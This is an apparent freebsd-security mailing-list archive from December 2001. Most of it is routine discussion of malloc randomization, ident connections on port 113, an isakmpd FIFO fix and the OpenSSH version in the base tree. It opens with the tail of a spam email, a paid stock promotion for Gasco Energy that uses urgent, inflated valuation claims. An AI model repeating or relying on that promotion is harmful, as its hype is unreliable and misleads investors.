            production and ad valorem taxes, operating expenses and ALL fu=
ture 
            capital costs from the gross revenues. While these are net rev=
enues, 
            as opposed to net income, this can mean great news for GASE=FF=
FFFF92s 
            existing and future shareholders! 
            <P align=3Djustify><FONT face=3Dverdana size=3D2>In evaluating=
 
            probabilities of occurrence, NSAI=FFFFFF92s report states =FFF=
FFF93there is very 
            little risk of not encountering gas in this basin-centered gas=
 
            accumulation=FFFFFF94. In fact according to NSAI, the property=
=FFFFFF92s most likely 
            present worth is $242 million discounted at 10% based on avera=
ge 
            NYMEX prices for the period 09/00 to 08/02. Wellhead prices us=
ed in 
            the report are $3.56 per MMBtu, escalated 3% per year to a max=
imum 
            of $4.15 per MMBtu. 
            <P align=3Djustify><FONT face=3Dverdana size=3D2>Foremost amon=
g GASE=FFFFFF92s 
            strategic partnerships is GASE=FFFFFF92s agreement with Philli=
ps Petroleum 
            (NYSE:P). GASE and Phillips have been working to maximize 
            shareholder value on the Utah properties. GASE has also teamed=
 with 
            Halliburton Co. (NYSE:HAL) to potentially drill and complete u=
p to 
            10 wells within the same area. 
            <P align=3Djustify><FONT face=3Dverdana size=3D2>IN ADDITION t=
o the 
            interest in Utah properties, GASE also recently reported that =
it has 
            teamed up with Burlington Resources (NYSE: BR) - one of the wo=
rld's 
            largest independent oil and gas companies - to explore and dev=
elop a 
            series of natural gas plays in Wyoming. This significantly enl=
arges 
            GASE=FFFFFF92s land mass, which may further increase the compa=
ny=FFFFFF92s net 
            present worth!! 
            <P align=3Djustify><FONT face=3Dverdana size=3D2>According to =
the U. S. 
            Geological Survey, the Greater Green River Basin has produced =
more 
            than 7.3 trillion cubic feet of natural gas and 849 million ba=
rrels 
            of oil, making it one of the country's truly significant oil a=
nd gas 
            fields. Burlington Resources is the perfect partner to help de=
velop 
            the many highly fractured, tight-gas-sands prospects the compa=
nies 
            expect to find there. 
            <P align=3Djustify><FONT face=3Dverdana 
            size=3D2><B>OPPORTUNITY:</B><BR>Based on GASE=FFFFFF92s recove=
rable resources, 
            property=FFFFFF92s present worth and industry partnerships Lon=
don based 
            Canaccord Capital recently issued an Investment report estimat=
ing 
            the value of Gasco=FFFFFF92s licenses to be $740 Million, or $=
14.80 per 
            share. 
            <P align=3Djustify><FONT face=3Dverdana size=3D2>Despite all t=
he recent 
            developments, the company=FFFFFF92s stock is still trading bel=
ow $3. Many 
            consider this to be ridiculously low, considering that NSAI 
            estimates future net revenues of up to $2.4 billion and unrisk=
ed 
            present worth at $242 million. With its high probability Utah =
stake 
            AND its Wyoming partnership with Burlington, GASE is now diver=
sified 
            AND showing huge growth potential! 
            <P align=3Djustify><FONT face=3Dverdana size=3D2><B>BILLION DO=
LLAR 
            QUESTION:</B><BR>How quickly will GASE=FFFFFF92s stock price s=
tart to 
            reflect its real value? As the company is still trading on the=
 
            OTCBB, maybe it hasn=FFFFFF92t been able to attract institutio=
nal investors 
            who price stocks based on their real value. When they learn ab=
out 
            the recent developments, GASE=FFFFFF92s valuation could potent=
ially change 
            overnight! 
            <P align=3Djustify><FONT face=3Dverdana size=3D2><B>URGENT!</B=
><BR>With an 
            application for listing pending and the type of assets GASE 
            possesses, it may be only a matter of time before the company =
jumps 
            to Amex. That would open a lot of doors for GASE and potential=
ly 
            explode the demand for GASE stock and lead to a much higher 
            valuation! What will GASE be trading at by then? 
            <P><A href=3D"http://www.stockscape.com/micro/scs/gasco/NSA.pd=
f" 
            target=3D_blank>Click Here to read the NSAI Report</A> 
            <P><A href=3D"http://www.stockscape.com/micro/scs/gasco/canacc=
ord.pdf" 
            target=3D_blank>Click Here to read the Canaccord Report</A> 
            <P align=3Djustify><FONT face=3Dverdana size=3D2><B>Contact Us=
</B><BR>One 
            of our Corporate Relations Representatives would be happy to a=
nswer 
            any questions you may have. Please call us at 1-800-645-9254, =
or 
            visit the company's website at <A href=3D"http://www.gascoener=
gy.com" 
            target=3D_blank>www.gascoenergy.com.</A> 
            </FONT></P></FONT></FONT></FONT></FONT></FONT></FONT></FONT></=
FONT></FONT></FONT></FONT></TD></TR></TBODY></TABLE>
      <TABLE>
        <TBODY>
        <TR>
          <TD width=3D350>
            <TABLE width=3D"100%" border=3D0>
              <TBODY>
              <TR>
                <TD align=3Dmiddle colSpan=3D2><A 
                  href=3D"javascript:openWindow('http://stockscape.stockpo=
int.com/stockscape/quote.asp?Dmode=3DYES&amp;Symbol=3Dgase&amp;PlotType=3D=
mountain','newWin',850,600,1)"></A><A 
                  href=3D"http://stockscape.stockpoint.com/stockscape/quot=
e.asp?Dmode=3DYES&amp;Symbol=3Dgase" 
                  target=3D_blank><IMG height=3D27 
                  alt=3D"Click to view GASE's detailed Quote &amp; Chart" 
                  src=3D"http://www.stockscape.com/stockscape_com/companie=
s/images/detailedquote.gif" 
                  width=3D135 vspace=3D2 border=3D0></A></TD></TR>
              <TR bgColor=3D#ffffcc>
                <TD align=3Dmiddle colSpan=3D2><FONT 
                  face=3D"Verdana, Tahoma, Trebuchet MS, Arial, Helvetica,=
 sans-serif" 
                  color=3D#000000 size=3D1><A 
                  href=3D"http://stockscape.stockpoint.com/stockscape/quot=
e.asp?Dmode=3DYES&amp;Symbol=3Dgase" 
                  target=3D_blank>GASE</A> : OTCBB</FONT></TD></TR>
              <TR vAlign=3Dbottom bgColor=3D#f0f0f0>
                <TD><FONT 
                  face=3D"Verdana, Tahoma, Trebuchet MS, Arial, Helvetica,=
 sans-serif" 
                  color=3D#000000 size=3D1>52 Week High:</FONT></TD>
                <TD align=3Dright><FONT 
                  face=3D"Verdana, Tahoma, Trebuchet MS, Arial, Helvetica,=
 sans-serif" 
                  color=3D#000000 size=3D1>$4.063</FONT></TD></TR>
              <TR vAlign=3Dbottom>
                <TD align=3Dleft><FONT 
                  face=3D"Verdana, Tahoma, Trebuchet MS, Arial, Helvetica,=
 sans-serif" 
                  color=3D#000000 size=3D1>52 Week Low:</FONT></TD>
                <TD align=3Dright><FONT 
                  face=3D"Verdana, Tahoma, Trebuchet MS, Arial, Helvetica,=
 sans-serif" 
                  color=3D#000000 size=3D1>$0.031</FONT></TD></TR>
              <TR vAlign=3Dbottom bgColor=3D#f0f0f0>
                <TD><FONT 
                  face=3D"Verdana, Tahoma, Trebuchet MS, Arial, Helvetica,=
 sans-serif" 
                  color=3D#000000 size=3D1>Shares Outstanding:</FONT></TD>
                <TD align=3Dright><FONT 
                  face=3D"Verdana, Tahoma, Trebuchet MS, Arial, Helvetica,=
 sans-serif" 
                  color=3D#000000 size=3D1>27.25 MILLION</FONT></TD></TR><=
/TBODY></TABLE>
            <P> </P></TD>
          <TD width=3D450><IMG 
            src=3D"http://chart.neural.com/servlet/GIFChart?sym1=3Dgase&am=
p;width=3D428&amp;height=3D225&amp;dres=3DDAY&amp;dcnt=3D90&amp;dperiod=3D=
DAYS&amp;plottype=3DLINE&amp;ind7=3Dvolume&amp;csym1=3Dblk&amp;csym2=3Dred=
&amp;csym3=3Ddgrn&amp;csym4=3Dblu&amp;csym5=3Dmag&amp;cbcku=3Dffffcc&amp;c=
bckl=3Dffffcc&amp;cbckd=3Dffffcc&amp;cbckg=3DCCCC99&amp;ctxtu=3Dblu&amp;ct=
xtd=3Dblu&amp;ctxtl=3Dblu&amp;cind1a=3Dred&amp;cind2=3Dblk&amp;cind3=3Dred=
&amp;cind3a=3Dlblu&amp;cind4=3D7200AA&amp;cind5=3DAA681A&amp;cind6=3Dmag&a=
mp;cind7=3Dgrn&amp;cind7a=3Dred&amp;cind8=3Dgrn&amp;cind9=3Dred&amp;cind9a=
=3D006400&amp;cind9b=3D7b68ee&amp;cind10=3Dcyn&amp;cind11=3Dffa500&amp;cav=
g1=3Dlred&amp;cavg2=3Dcyn&amp;source=3DSTOCKSCAPE&amp;ignore=3D122001335" 
            border=3D0></TD></TR></TBODY></TABLE>
      <HR>

      <P><FONT size=3D2>Investment News Alert&nbsp; Disclaimer: Please be 
      aware that SS is a news service and NOT an investment advisory servi=
ce; it 
      is advised that you consult with a licensed financial advisor before=
 
      making any investment decisions. This information comprises a paid 
      advertising supplement for which SS was compensated. In the case of =
Gasco 
      Energy Inc., SS will be compensated $22,000 by a third party. This 
      publication does not provide an analysis of a company's financial po=
sition 
      and the information herein should NOT be construed as an offer to bu=
y or 
      sell securities. The information herein is taken from sources though=
t to 
      be accurate, but there is no guarantee. All due diligence should be =
done 
      by the reader or their financial advisor. Investing in securities is=
 
      speculative and carries risk. Past performance does not guarantee fu=
ture 
      results. </FONT></P></TD></TR>
  <TR>
    <TD align=3Dmiddle width=3D"100%" colSpan=3D3></TD></TR></TBODY></TABL=
E></BODY></HTML>


To Unsubscribe: send mail to majordomo@FreeBSD.org
with "unsubscribe freebsd-security" in the body of the message


From owner-freebsd-security  Mon Dec  3  4:44:44 2001
Delivered-To: freebsd-security@freebsd.org
Received: from fledge.watson.org (fledge.watson.org [204.156.12.50])
	by hub.freebsd.org (Postfix) with ESMTP id 863A937B417
	for <freebsd-security@freebsd.org>; Mon,  3 Dec 2001 04:44:41 -0800 (PST)
Received: from fledge.watson.org (robert@fledge.pr.watson.org [192.0.2.3])
	by fledge.watson.org (8.11.6/8.11.5) with SMTP id fB3CiOi31256;
	Mon, 3 Dec 2001 07:44:25 -0500 (EST)
	(envelope-from robert@fledge.watson.org)
Date: Mon, 3 Dec 2001 07:44:24 -0500 (EST)
From: Robert Watson <rwatson@freebsd.org>
X-Sender: robert@fledge.watson.org
To: Alfred Perlstein <bright@mu.org>
Cc: Oleg Cherkasov <Oleg.Cherkasov@mail.com>,
	freebsd-security@freebsd.org
Subject: Re: philosophical question...
In-Reply-To: <20011203032305.K92148@elvis.mu.org>
Message-ID: <Pine.NEB.3.96L.1011203074251.94074Q-100000@fledge.watson.org>
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
List-ID: <freebsd-security.FreeBSD.ORG>
List-Archive: <http://docs.freebsd.org/mail/> (Web Archive)
List-Help: <mailto:majordomo@FreeBSD.ORG?subject=help> (List Instructions)
List-Subscribe: <mailto:majordomo@FreeBSD.ORG?subject=subscribe%20freebsd-security>
List-Unsubscribe: <mailto:majordomo@FreeBSD.ORG?subject=unsubscribe%20freebsd-security>
X-Loop: FreeBSD.org


On Mon, 3 Dec 2001, Alfred Perlstein wrote:

> * Oleg Cherkasov <Oleg.Cherkasov@mail.com> [011203 03:16] wrote:
> > 
> > Think a new key 'malloc.random' for sysctl could be more useful, protected 
> > with 'kern.securelevel' > 1.
> 
> However, malloc(3) has nothing to do with the kernel.

Yeah, I'm not sure why it would be keyed off of 'securelevel'.  Seems to
me that we should avoid any more userland cruft being associated
unnecessarily with securelevels, actually :-). 

And if we do stuff this in a securelevel, it sounds like we need a
userland.<applicationname> sysctl namespace.  More likely, we just need
this to be a flag on /etc/malloc.conf. 

Robert N M Watson             FreeBSD Core Team, TrustedBSD Project
robert@fledge.watson.org      NAI Labs, Safeport Network Services


To Unsubscribe: send mail to majordomo@FreeBSD.org
with "unsubscribe freebsd-security" in the body of the message


From owner-freebsd-security  Mon Dec  3  4:51: 2 2001
Delivered-To: freebsd-security@freebsd.org
Received: from promavto.ru (quadrus.niit.ru [212.5.121.43])
	by hub.freebsd.org (Postfix) with ESMTP id CA87637B41A
	for <security@freebsd.org>; Mon,  3 Dec 2001 04:50:58 -0800 (PST)
Received: (from root@localhost)
	by promavto.ru (8.9.3/8.9.3) id PAA03196
	for security@freebsd.org.AVP; Mon, 3 Dec 2001 15:50:57 +0300 (MSK)
	(envelope-from jhvhs@promavto.ru)
Received: from jhvhs (jhvhs.quadrusm.ru [192.168.43.67])
	by promavto.ru (8.9.3/8.9.3) with SMTP id PAA03188
	for <security@freebsd.org>; Mon, 3 Dec 2001 15:50:57 +0300 (MSK)
	(envelope-from jhvhs@promavto.ru)
Reply-To: <jhvhs@promavto.ru>
From: "Konstantin V. Semenov" <jhvhs@promavto.ru>
To: <security@freebsd.org>
Subject: What could be doing this?
Date: Mon, 3 Dec 2001 15:51:25 +0300
Message-ID: <008701c17bf9$38780f30$432ba8c0@quadrusm.ru>
MIME-Version: 1.0
Content-Type: text/plain;
	charset="koi8-r"
Content-Transfer-Encoding: 7bit
X-Priority: 3 (Normal)
X-MSMail-Priority: Normal
X-Mailer: Microsoft Outlook CWS, Build 9.0.2416 (9.0.2911.0)
X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2600.0000
Importance: Normal
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
List-ID: <freebsd-security.FreeBSD.ORG>
List-Archive: <http://docs.freebsd.org/mail/> (Web Archive)
List-Help: <mailto:majordomo@FreeBSD.ORG?subject=help> (List Instructions)
List-Subscribe: <mailto:majordomo@FreeBSD.ORG?subject=subscribe%20freebsd-security>
List-Unsubscribe: <mailto:majordomo@FreeBSD.ORG?subject=unsubscribe%20freebsd-security>
X-Loop: FreeBSD.org

Hi everyone!

Possibly it's a stupid question, but can somebody
explain me why my box is constantly trying to connect
to [some.random.IP.address]:113?

I have <don't snigger, pls> 3.1-STABLE
Additional features are:
Apache, ssh, AVPBSDDaemon with AVPKeeper

I keep getting loads of deny records in the logs and it seems
to be wrong. It's not a stupid Win box (which is completely unable
to stop making network noises)


  Kind regards,


     Konstantin V Semenov aka JHVHS
                                        jhvhs@quadrus.ru

		PromAvtoContract plc.   http://www.promavto.ru


To Unsubscribe: send mail to majordomo@FreeBSD.org
with "unsubscribe freebsd-security" in the body of the message


From owner-freebsd-security  Mon Dec  3  5: 1:19 2001
Delivered-To: freebsd-security@freebsd.org
Received: from hq1.tyfon.net (hq1.tyfon.net [217.27.162.35])
	by hub.freebsd.org (Postfix) with ESMTP id 3F1B037B405
	for <security@freebsd.org>; Mon,  3 Dec 2001 05:01:16 -0800 (PST)
Received: from localhost (localhost [127.0.0.1])
	by hq1.tyfon.net (Postfix) with ESMTP
	id 1B40F1C7F6; Mon,  3 Dec 2001 14:01:14 +0100 (CET)
Received: from localhost (localhost [127.0.0.1])
	by hq1.tyfon.net (Postfix) with ESMTP
	id 27ED31C7F5; Mon,  3 Dec 2001 14:01:13 +0100 (CET)
Date: Mon, 3 Dec 2001 14:01:13 +0100 (CET)
From: Dan Larsson <dl@tyfon.net>
To: "Konstantin V. Semenov" <jhvhs@promavto.ru>
Cc: security@freebsd.org
Subject: Re: What could be doing this?
In-Reply-To: <008701c17bf9$38780f30$432ba8c0@quadrusm.ru>
Message-ID: <20011203135334.X54362-100000@hq1.tyfon.net>
Organization: Tyfon Svenska AB
X-NCC-NIC: DL1999-RIPE
X-NCC-RegID: se.tyfon
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
X-Virus-Scanned: by hq1.tyfon.net
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
List-ID: <freebsd-security.FreeBSD.ORG>
List-Archive: <http://docs.freebsd.org/mail/> (Web Archive)
List-Help: <mailto:majordomo@FreeBSD.ORG?subject=help> (List Instructions)
List-Subscribe: <mailto:majordomo@FreeBSD.ORG?subject=subscribe%20freebsd-security>
List-Unsubscribe: <mailto:majordomo@FreeBSD.ORG?subject=unsubscribe%20freebsd-security>
X-Loop: FreeBSD.org

On Mon, 3 Dec 2001, Konstantin V. Semenov wrote:

| Possibly it's a stupid question, but can somebody
| explain me why my box is constantly trying to connect
| to [some.random.IP.address]:113?

% grep '113/tcp' /etc/services
auth            113/tcp    ident tap    #Authentication Service

If your box is also running as a mailserver it might
be because sendmail is checking the identity of the connecting
client.


Regards
+------
Dan Larsson  -+- Tyfon Svenska AB -+-  DL1999-RIPE
2AA5 90AE 5185 5924 1E0B  1A99 EC8A EA84 406B 06B9


To Unsubscribe: send mail to majordomo@FreeBSD.org
with "unsubscribe freebsd-security" in the body of the message


From owner-freebsd-security  Mon Dec  3  5:25:57 2001
Delivered-To: freebsd-security@freebsd.org
Received: from promavto.ru (quadrus.niit.ru [212.5.121.43])
	by hub.freebsd.org (Postfix) with ESMTP id 05B9737B417
	for <security@freebsd.org>; Mon,  3 Dec 2001 05:25:54 -0800 (PST)
Received: (from root@localhost)
	by promavto.ru (8.9.3/8.9.3) id QAA03612
	for security@freebsd.org.AVP; Mon, 3 Dec 2001 16:25:53 +0300 (MSK)
	(envelope-from jhvhs@promavto.ru)
Received: from jhvhs (jhvhs.quadrusm.ru [192.168.43.67])
	by promavto.ru (8.9.3/8.9.3) with SMTP id QAA03596;
	Mon, 3 Dec 2001 16:25:51 +0300 (MSK)
	(envelope-from jhvhs@promavto.ru)
Reply-To: <jhvhs@promavto.ru>
From: "Konstantin V. Semenov" <jhvhs@promavto.ru>
To: "'David Wolfskill'" <david@catwhisker.org>
Cc: <security@freebsd.org>
Subject: RE: What could be doing this?
Date: Mon, 3 Dec 2001 16:26:20 +0300
Message-ID: <009401c17bfe$18d75780$432ba8c0@quadrusm.ru>
MIME-Version: 1.0
Content-Type: text/plain;
	charset="koi8-r"
Content-Transfer-Encoding: 7bit
X-Priority: 3 (Normal)
X-MSMail-Priority: Normal
X-Mailer: Microsoft Outlook CWS, Build 9.0.2416 (9.0.2911.0)
In-Reply-To: <200112031301.fB3D11R29046@bunrab.catwhisker.org>
X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2600.0000
Importance: Normal
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
List-ID: <freebsd-security.FreeBSD.ORG>
List-Archive: <http://docs.freebsd.org/mail/> (Web Archive)
List-Help: <mailto:majordomo@FreeBSD.ORG?subject=help> (List Instructions)
List-Subscribe: <mailto:majordomo@FreeBSD.ORG?subject=subscribe%20freebsd-security>
List-Unsubscribe: <mailto:majordomo@FreeBSD.ORG?subject=unsubscribe%20freebsd-security>
X-Loop: FreeBSD.org


> It's probably not as "random" as you think:  I suspect it corresponds
> with what SMTP servers to which you try to send mail.  It is 
> common for
> an SMTP server to do an IDENT query to an SMTP client.
> 

So it's just someone trying to send mail through my machine?
I have restricted SMTP from the ${oif}.
So it must log deny port 25 attempts and never try to identify
the client. Am I wrong?

  Kind regards,


     Konstantin V Semenov aka JHVHS
                                        jhvhs@quadrus.ru

		PromAvtoContract plc.   http://www.promavto.ru


To Unsubscribe: send mail to majordomo@FreeBSD.org
with "unsubscribe freebsd-security" in the body of the message


From owner-freebsd-security  Mon Dec  3  5:58:13 2001
Delivered-To: freebsd-security@freebsd.org
Received: from junior.lgc.com (junior.lgc.com [134.132.72.99])
	by hub.freebsd.org (Postfix) with ESMTP id 6596B37B416
	for <freebsd-security@freebsd.org>; Mon,  3 Dec 2001 05:58:11 -0800 (PST)
Received: from lgchvw02.lgc.com (lgchvw02.lgc.com [134.132.93.108])
	by junior.lgc.com (8.11.3/8.11.3) with SMTP id fB3DvG721668
	for <freebsd-security@freebsd.org>; Mon, 3 Dec 2001 07:57:16 -0600 (CST)
Received: from 134.132.72.99 by lgchvw02.lgc.com (InterScan E-Mail VirusWall NT); Mon, 03 Dec 2001 07:58:01 -0600
Received: from vesna (oleg@[134.132.197.98])
	by junior.lgc.com (8.11.3/8.11.3) with SMTP id fB3DvAS21653
	for <freebsd-security@freebsd.org>; Mon, 3 Dec 2001 07:57:10 -0600 (CST)
Content-Type: text/plain;
  charset="iso-8859-1"
From: Oleg Cherkasov <Oleg.Cherkasov@mail.com>
Organization: http://oleg.dnsalias.com
To: freebsd-security@freebsd.org
Subject: Re: philosophical question...
Date: Mon, 3 Dec 2001 14:57:55 +0100
X-Mailer: KMail [version 1.2]
References: <Pine.NEB.3.96L.1011203074251.94074Q-100000@fledge.watson.org>
In-Reply-To: <Pine.NEB.3.96L.1011203074251.94074Q-100000@fledge.watson.org>
MIME-Version: 1.0
Message-Id: <01120314575508.10748@vesna>
Content-Transfer-Encoding: 8bit
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
List-ID: <freebsd-security.FreeBSD.ORG>
List-Archive: <http://docs.freebsd.org/mail/> (Web Archive)
List-Help: <mailto:majordomo@FreeBSD.ORG?subject=help> (List Instructions)
List-Subscribe: <mailto:majordomo@FreeBSD.ORG?subject=subscribe%20freebsd-security>
List-Unsubscribe: <mailto:majordomo@FreeBSD.ORG?subject=unsubscribe%20freebsd-security>
X-Loop: FreeBSD.org

On Monday 03 December 2001 13:44, Robert Watson wrote:
> On Mon, 3 Dec 2001, Alfred Perlstein wrote:
> > * Oleg Cherkasov <Oleg.Cherkasov@mail.com> [011203 03:16] wrote:
> > > Think a new key 'malloc.random' for sysctl could be more useful,
> > > protected with 'kern.securelevel' > 1.
> >
> > However, malloc(3) has nothing to do with the kernel.
>
> Yeah, I'm not sure why it would be keyed off of 'securelevel'.  Seems to
> me that we should avoid any more userland cruft being associated
> unnecessarily with securelevels, actually :-).
>
> And if we do stuff this in a securelevel, it sounds like we need a
> userland.<applicationname> sysctl namespace.  More likely, we just need
> this to be a flag on /etc/malloc.conf.

Yes, you are right, it is better to keep it out of the kernel.  But except 
having /etc/malloc.conf, is it better to have a shell variable MEMORY_RANDOM 
or MALLOC_CONF?  In this case just 'weak' services can be run with that 
option on.  We still do not know how will it affect performance ... because 
it will be additional cycles during memory allocation for every single 
*alloc() call.  Some software could be very aggressive using malloc(), who 
knows.

Oleg

To Unsubscribe: send mail to majordomo@FreeBSD.org
with "unsubscribe freebsd-security" in the body of the message


From owner-freebsd-security  Mon Dec  3  6: 4: 4 2001
Delivered-To: freebsd-security@freebsd.org
Received: from hale.inty.net (hale.inty.net [195.92.21.144])
	by hub.freebsd.org (Postfix) with ESMTP id E3F9137B405
	for <freebsd-security@freebsd.org>; Mon,  3 Dec 2001 06:03:56 -0800 (PST)
Received: from inty.hq.inty.net (inty.hq.inty.net [213.38.150.150])
	by hale.inty.net (8.11.3/8.11.3) with ESMTP id fB3E3q666053
	for <freebsd-security@freebsd.org>; Mon, 3 Dec 2001 14:03:52 GMT
Received: from tariq ([10.0.1.156])
	by inty.hq.inty.net (8.9.3/8.9.3) with SMTP id OAA40183
	for <freebsd-security@freebsd.org>; Mon, 3 Dec 2001 14:03:51 GMT
From: "Tariq Rashid" <tariq@inty.net>
To: <freebsd-security@freebsd.org>
Subject: isakmpd cpu hog: fix?
Date: Mon, 3 Dec 2001 14:05:35 -0000
Message-ID: <MPENKFCCIIDAJKJJOLBHKEFCCDAA.tariq@inty.net>
MIME-Version: 1.0
Content-Type: text/plain;
	charset="iso-8859-1"
Content-Transfer-Encoding: 7bit
X-Priority: 3 (Normal)
X-MSMail-Priority: Normal
X-Mailer: Microsoft Outlook IMO, Build 9.0.2416 (9.0.2910.0)
X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2600.0000
Importance: Normal
X-Skip-Virus-Check: yes
X-Virus-Checked: 40452
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
List-ID: <freebsd-security.FreeBSD.ORG>
List-Archive: <http://docs.freebsd.org/mail/> (Web Archive)
List-Help: <mailto:majordomo@FreeBSD.ORG?subject=help> (List Instructions)
List-Subscribe: <mailto:majordomo@FreeBSD.ORG?subject=subscribe%20freebsd-security>
List-Unsubscribe: <mailto:majordomo@FreeBSD.ORG?subject=unsubscribe%20freebsd-security>
X-Loop: FreeBSD.org


 for the FreeBSD port of idakmpd there has been a long standing bug - it
soaked up all CPU ....

 open fifo in RDWR not RDONLY mode...

ui.c:
      /* No need to know about errors.  */
      unlink (ui_fifo);
      if (mkfifo (ui_fifo, 0600) == -1)
	log_fatal ("ui_init: mkfifo (\"%s\", 0600) failed", ui_fifo);

      /* XXX Is O_RDWR needed on some OSes?  Photurisd seems to imply that.
*/
      // TR ... FIFO opened as O_RDWR and not O_RDONLY ... ?
      ui_socket = open (ui_fifo, O_RDWR | O_NONBLOCK, 0);
      //      ui_socket = open (ui_fifo, O_RDONLY | O_NONBLOCK, 0);
      if (ui_socket == -1)
	log_fatal ("ui_init: open (\"%s\", O_RDONLY | O_NONBLOCK, 0) failed",
		   ui_fifo);
    }

we think .... ? seems to work now....

tariq


-----------------------------------------------
Information in this electronic mail message is confidential
and may be legally privileged. It is intended solely for
the addressee. Access to this message by anyone else is
unauthorised. If you are not the intended recipient any 
use, disclosure, copying or distribution of this message is
prohibited and may be unlawful. When addressed to our
customers, any information contained in this message is
subject to Intelligent Network Technology Ltd Terms & Conditions.
-----------------------------------------------
Take part in the intY 2001 Email Usage survey
online at http://www.inty.net/email/survey.html
-----------------------------------------------

intY has automatically scanned this email using Sophos Anti-Virus (www.inty.net)


To Unsubscribe: send mail to majordomo@FreeBSD.org
with "unsubscribe freebsd-security" in the body of the message


From owner-freebsd-security  Mon Dec  3  7: 7:19 2001
Delivered-To: freebsd-security@freebsd.org
Received: from odin.ac.hmc.edu (Odin.AC.HMC.Edu [134.173.32.75])
	by hub.freebsd.org (Postfix) with ESMTP id EF07437B405
	for <freebsd-security@FreeBSD.ORG>; Mon,  3 Dec 2001 07:07:16 -0800 (PST)
Received: (from brdavis@localhost)
	by odin.ac.hmc.edu (8.11.0/8.11.0) id fB3F7Gc22593;
	Mon, 3 Dec 2001 07:07:16 -0800
Date: Mon, 3 Dec 2001 07:07:16 -0800
From: Brooks Davis <brooks@one-eyed-alien.net>
To: Oleg Cherkasov <Oleg.Cherkasov@mail.com>
Cc: freebsd-security@FreeBSD.ORG
Subject: Re: philosophical question...
Message-ID: <20011203070716.A21558@Odin.AC.HMC.Edu>
References: <Pine.NEB.3.96L.1011203074251.94074Q-100000@fledge.watson.org> <01120314575508.10748@vesna>
Mime-Version: 1.0
Content-Type: multipart/signed; micalg=pgp-md5;
	protocol="application/pgp-signature"; boundary="OgqxwSJOaUobr8KG"
Content-Disposition: inline
User-Agent: Mutt/1.2.5i
In-Reply-To: <01120314575508.10748@vesna>; from Oleg.Cherkasov@mail.com on Mon, Dec 03, 2001 at 02:57:55PM +0100
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
List-ID: <freebsd-security.FreeBSD.ORG>
List-Archive: <http://docs.freebsd.org/mail/> (Web Archive)
List-Help: <mailto:majordomo@FreeBSD.ORG?subject=help> (List Instructions)
List-Subscribe: <mailto:majordomo@FreeBSD.ORG?subject=subscribe%20freebsd-security>
List-Unsubscribe: <mailto:majordomo@FreeBSD.ORG?subject=unsubscribe%20freebsd-security>
X-Loop: FreeBSD.org


--OgqxwSJOaUobr8KG
Content-Type: text/plain; charset=us-ascii
Content-Disposition: inline
Content-Transfer-Encoding: quoted-printable

On Mon, Dec 03, 2001 at 02:57:55PM +0100, Oleg Cherkasov wrote:
>=20
> Yes, you are right, it is better to keep it out of the kernel.  But excep=
t=20
> having /etc/malloc.conf, is it better to have a shell variable MEMORY_RAN=
DOM=20
> or MALLOC_CONF?  In this case just 'weak' services can be run with that=
=20
> option on.  We still do not know how will it affect performance ... becau=
se=20
> it will be additional cycles during memory allocation for every single=20
> *alloc() call.  Some software could be very aggressive using malloc(), wh=
o=20
> knows.

The MALLOC_OPTIONS variable would allow this.  Please RFTM before
posting.

-- Brooks

--=20
Any statement of the form "X is the one, true Y" is FALSE.
PGP fingerprint 655D 519C 26A7 82E7 2529  9BF0 5D8E 8BE9 F238 1AD4

--OgqxwSJOaUobr8KG
Content-Type: application/pgp-signature
Content-Disposition: inline

-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.0.6 (GNU/Linux)
Comment: For info see http://www.gnupg.org

iD8DBQE8C5UjXY6L6fI4GtQRAr9zAKCsPiKk2OzrpsGFeDJnr6+Kwmx4IgCfSygm
3tedXL84PtuFpi9Ahpy3IRc=
=9/px
-----END PGP SIGNATURE-----

--OgqxwSJOaUobr8KG--

To Unsubscribe: send mail to majordomo@FreeBSD.org
with "unsubscribe freebsd-security" in the body of the message


From owner-freebsd-security  Mon Dec  3  9:13:49 2001
Delivered-To: freebsd-security@freebsd.org
Received: from web11604.mail.yahoo.com (web11604.mail.yahoo.com [216.136.172.56])
	by hub.freebsd.org (Postfix) with SMTP id 0342937B41A
	for <security@freebsd.org>; Mon,  3 Dec 2001 09:13:46 -0800 (PST)
Message-ID: <20011203171345.74687.qmail@web11604.mail.yahoo.com>
Received: from [128.235.249.41] by web11604.mail.yahoo.com via HTTP; Mon, 03 Dec 2001 09:13:45 PST
Date: Mon, 3 Dec 2001 09:13:45 -0800 (PST)
From: Holtor <holtor@yahoo.com>
Subject: OpenSSH
To: security@freebsd.org
MIME-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
List-ID: <freebsd-security.FreeBSD.ORG>
List-Archive: <http://docs.freebsd.org/mail/> (Web Archive)
List-Help: <mailto:majordomo@FreeBSD.ORG?subject=help> (List Instructions)
List-Subscribe: <mailto:majordomo@FreeBSD.ORG?subject=subscribe%20freebsd-security>
List-Unsubscribe: <mailto:majordomo@FreeBSD.ORG?subject=unsubscribe%20freebsd-security>
X-Loop: FreeBSD.org

Fellow FreeBSD'ers,

When will OpenSSH 3.0.2 or 3.x for that matter be
included in the base tree?

TIA!

Holt

__________________________________________________
Do You Yahoo!?
Buy the perfect holiday gifts at Yahoo! Shopping.
http://shopping.yahoo.com

To Unsubscribe: send mail to majordomo@FreeBSD.org
with "unsubscribe freebsd-security" in the body of the message


From owner-freebsd-security  Mon Dec  3  9:29:29 2001
Delivered-To: freebsd-security@freebsd.org
Received: from web21205.mail.yahoo.com (web21205.mail.yahoo.com [216.136.131.248])
	by hub.freebsd.org (Postfix) with SMTP id A086337B416
	for <freebsd-security@freebsd.org>; Mon,  3 Dec 2001 09:29:25 -0800 (PST)
Message-ID: <20011203172921.73215.qmail@web21205.mail.yahoo.com>
Received: from [62.153.168.98] by web21205.mail.yahoo.com via HTTP; Mon, 03 Dec 2001 09:29:21 PST
